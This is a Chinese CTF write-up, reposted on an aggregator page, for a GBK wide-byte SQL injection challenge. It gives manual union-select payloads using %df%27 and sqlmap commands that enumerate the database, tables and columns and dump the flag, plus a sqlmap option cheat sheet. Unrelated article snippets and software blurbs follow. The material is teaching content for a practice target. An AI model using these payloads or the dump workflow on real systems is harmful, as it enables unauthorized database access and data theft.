SQL注入-低调大师

SQL注入

2018-09-18 723

题目:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
本题为宽字节注入，本文重点讲解SQL注入相关方法。

方法一：

1、爆出数据库

手工

id=%df%27%20union%20select%201,%20database()%23

工具

python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db

2、爆出表

手工

id=%df%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23

工具

python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover --tables

3、爆出表的内容

手工

id=%df%27 union select 1,group_concat(column_name)from information_schema.columns where table_name=ctf4%23
ctf4进行16进制转换
id=%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23

工具

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 --columns

4、获取列的内容

手工

id=%df%27 union select 1,group_concat(flag) from ctf4%23

工具

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 -C flag --dump

方法二：

sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --search -C flag
--level 3 --risk 1 --thread 10

方法三：

python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db

关注黄色标注，打开此文件可得。

关于手工注入：

后续参考：
1、SQL备忘录
2、SQL Injection

关于sqlmap注入：

-h 显示基础的帮助消息并退出
-hh 显示高级的帮助消息并退出
-u 目标url
--thread 10 最大为10
--level 3 最大为5
--risk 3 最大为3
-a 检索所有
--current-db 检索当前数据库
--tables 枚举数据库表名
--columns 枚举数据库列名
--dump 输出数据库表的数据
--search 查找特定的列名，表名或数据库名，配合-D,-C,-T
-D 指定数据库名
-T 指定数据库表名
-C 指定数据库列名
--common-tables 检测常见的表名
--common-columns 检测常见的列名

微信关注我们

原文链接：https://yq.aliyun.com/articles/657595

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

一起探讨 JavaScript 的对象

原文地址：Let’s explore objects in JavaScript 原文作者：Cristi Salcescu 译文出自：阿里云翻译小组译文链接：https://github.com/dawn-teams/translate/blob/master/articles/Let’s-explore-objects-in-JavaScript.md 译者：灵沼校对者：也树，眠云一起探讨 JavaScript 的对象对象是多个属性的动态集合，它有一个链接着原型的隐藏属性（注：__proto__）。一个属性拥有一个 key 和一个 value 。属性的 key 属性的 key 是一个唯一的字符串。访问属性有两种方式：点表示法和括号表示法。当使用点表示法，属性的 key 必须是有效的标识符。 let obj = { message :

2018-09-19

627

Django 框架 WEB 与服务器 WEB : 表示用户可以浏览的网页内容(HTML,CSS,JS) 服务器专门给用户提供服务的一台机器 1.硬件与软件硬件范畴:一台机器软件范畴:一个能够接受用户请求并给出响应的程序 1.APACHE 2.TOMCAT 3.IIS(Internet Information Service) 4.Nginx 2.服务器的作用 1.存储WEB上所需要的信息(HTML,图片,js,css,音视频) 2.处理用户的请求(request)并给出响应(response) 3.执行服务器端的程序 : 查找数据库 3.服务器与 WEB之间的关系 WEB需要放在服务器上才能够被用户访问框架什么是框架框架是一个为了解决开放性问题而存在的一种结构.框架本身会提供一些最基本的功能.我们只需要在基本功能之上搭建属于自己的操作即可. PYTH

2018-09-19

609

资源下载

更多资源

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长，特征是大鼻子、头戴帽子、身穿背带裤，还留着胡子。与他的双胞胎兄弟路易基一起，长年担任任天堂的招牌角色。

Nacos

Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service 的首字母简称，一个易于构建 AI Agent 应用的动态服务发现、配置管理和AI智能体管理平台。Nacos 致力于帮助您发现、配置和管理微服务及AI智能体应用。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据、流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。

Rocky Linux

Rocky Linux（中文名：洛基）是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版，作为CentOS稳定版停止维护后与RHEL（Red Hat Enterprise Linux）完全兼容的开源替代方案，由社区拥有并管理，支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性，采用模块化包装和SELinux安全架构，默认包含GNOME桌面环境及XFS文件系统，支持十年生命周期更新。

Sublime Text

Sublime Text具有漂亮的用户界面和强大的功能，例如代码缩略图，Python的插件，代码段等。还可自定义键绑定，菜单和工具栏。Sublime Text 的主要功能包括：拼写检查，书签，完整的 Python API ， Goto 功能，即时项目切换，多选择，多窗口等等。Sublime Text 是一个跨平台的编辑器，同时支持Windows、Linux、Mac OS X等操作系统。